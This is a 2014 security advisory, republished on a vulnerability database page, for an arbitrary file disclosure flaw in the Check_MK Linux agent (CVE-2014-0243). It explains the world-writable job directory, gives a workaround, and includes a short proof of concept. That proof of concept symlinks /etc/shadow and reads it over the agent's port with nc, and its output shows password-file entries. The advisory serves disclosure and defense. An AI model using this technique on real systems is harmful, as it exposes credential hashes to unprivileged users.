Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30760
HistoryMay 29, 2014 - 12:00 a.m.

LSE Leading Security Experts GmbH - LSE-2014-05-21 - Check_MK - Arbitrary File Disclosure Vulnerability

2014-05-2900:00:00
vulners.com
19
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===

Check_MK - Arbitrary File Disclosure Vulnerability

Affected Versions

Linux versions of Check_MK equal or greater than commit
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.

Other platforms are not affected as the vulnerable feature is not
implemented there.

Issue Overview

Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243

Issue Description

While conducting a whitebox test LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. It is not checked if the files are symbolic or hard
filesystem links.

As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.

The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:

<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther <[email protected]>
Date: Thu Sep 5 15:49:46 2013 +0200

mk-job: /var/lib/check_mk_agent/job directory is now
created with mode 1777 so mk-job can be used by
unprivileged users too: fixing bug #1040

<<>>

The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:

<<>>

Get statistics about monitored jobs

if cd /var/lib/check_mk_agent/job; then
echo '<<<job>>>'
head -n -0 -v *
fi
<<>>

Impact

A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job", pointing to a file he normally would
not have access to like "/etc/shadow". The agent expects output from
jobs using the mk-job Tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.

Temporary Workaround and Fix

LSE Leading Security Experts GmbH advises to remove the write
permissions and the sticky bit for non root users temporarily by
setting mode 755 on the directory.

Proof of Concept

[myhost]$ pwd
/var/lib/check_mk_agent/job
[myhost]$ ls -l
total 0
[myhost]$ ln -s /etc/shadow
[myhost]$ ls -la
total 4
drwxrwxrwt 2 root   root    4096 May 21 15:17 .
drwxr-xr-x 3 root   root    4096 Feb 26 13:54 ..
lrwxrwxrwx 1 myuser mygroup   11 May 21 15:17 shadow -&gt; /etc/shadow
[myhost]$ nc 127.0.0.1 6556
[...]
&lt;&lt;&lt;job&gt;&gt;&gt;
==&gt; shadow &lt;==
root:$6$[...]:16133:0:99999:7:::
bin:*:15937:0:99999:7:::
daemon:*:15937:0:99999:7:::
adm:*:15937:0:99999:7:::
lp:*:15937:0:99999:7:::
sync:*:15937:0:99999:7:::
shutdown:*:15937:0:99999:7:::
halt:*:15937:0:99999:7:::
mail:*:15937:0:99999:7:::
uucp:*:15937:0:99999:7:::
operator:*:15937:0:99999:7:::
games:*:15937:0:99999:7:::
gopher:*:15937:0:99999:7:::
ftp:*:15937:0:99999:7:::
nobody:*:15937:0:99999:7:::
[...]

History

2014-05-20 Issue discovery
2014-05-21 Permission of customer for advisory
2014-05-21 Vendor informed
2014-05-22 CVE requested
2014-05-22 Vendor response
2014-05-22 CVE-2014-0243 assigned
2014-05-26 Official fix available
2014-05-27 Advisory release

http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschaftsfuhrer: Oliver Michel, Sven Walther
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (FreeBSD)

iQIcBAEBAgAGBQJThYprAAoJEDgSCSGZ4yd8BgEP/07sJ4P4aByGKhCJmdmKo9+v
IdGPSYWqWp2Y2iIuE0J8zIkss0SHwU6bFa27h5pIplqUNDFiu4ycOlCpUkx0yh/F
z2DKxDGFQicegYHWj96Eagstj32P+vfo08yoLwxgC7vQawpbvTTM4edyunHUAuX9
r4Pb9Ia2OjFP+ePpP4Vp4HVHWEmO9kpEjm7irMvN+5Ft/fiMrrfafFXQk7/TO3Xr
jGyx+l/Hw0znGUWgRVPicaztpD72ZhYwYy1AC5mltXniqVDxP3xWjJMGrtwl4bW4
o+GWTdOn9sEV8V+quvAz9SLCvmGCghaakJqKYmzVLVP4+2I3M6mcu2l/1pl6M5jE
li+LScA9Fw6CwmUmk9gTduRTrHxcSWEzdRjrFll/Qh6DaU92YBTtfb5a7YCpFp+S
7Yf/ECA0BXTsfhY+M3CNUBSiJRCW6NQABIH/maOsK/u/Mq/gFcV0R/gd24YMIq1F
GzNzZPmNmGlqaZHcMijgdnJ9MKKxA/qLlhV4fAULafNq0fGz+gnp2H/CoJCLogLd
euJWtvcgqhOd5/m8O8YUi9pmyioHq7GNeN0oz+9MLurVKGZqilxCGaU1OLfSrwzx
z72qzSt3txs8+s72LGDMcw0/OOx0KYm3xYekzkRyOs4JkDOSIATAhvhSTbdp2myX
Kt8H8xrSmzdyUbTISR3E
=rbLP
-----END PGP SIGNATURE-----

Related

securityvulns 1
prion 1
nessus 3
packetstorm 1
ubuntucve 1
cve 1
fedora 2
openvas 2
securityvulns
securityvulns
check_mk symbolic links vulnerability
2014-05-29 00:00:00
prion
prion
Code injection
2018-07-19 17:29:00
nessus
nessus
Check_MK Agent for Linux 1.2.3i < 1.2.5i3 Arbitrary File Disclosure
2017-06-28 00:00:00
Fedora 20 : check-mk-1.2.4p2-2.fc20 (2014-6810)
2014-06-10 00:00:00
Fedora 19 : check-mk-1.2.4p2-2.fc19 (2014-6818)
2014-06-10 00:00:00
packetstorm
packetstorm
Check_MK Arbitrary File Disclosure
2014-05-29 00:00:00
ubuntucve
ubuntucve
CVE-2014-0243
2018-07-19 00:00:00
cve
cve
CVE-2014-0243
2018-07-19 17:29:00
fedora
fedora
[SECURITY] Fedora 20 Update: check-mk-1.2.4p2-2.fc20
2014-06-10 03:09:47
[SECURITY] Fedora 19 Update: check-mk-1.2.4p2-2.fc19
2014-06-10 03:08:54
openvas
openvas
Fedora Update for check-mk FEDORA-2014-6818
2014-06-17 00:00:00
Fedora Update for check-mk FEDORA-2014-6810
2014-06-17 00:00:00
JSON
Related for SECURITYVULNS:DOC:30760
securityvulns1prion1nessus3packetstorm1ubuntucve1cve1fedora2openvas2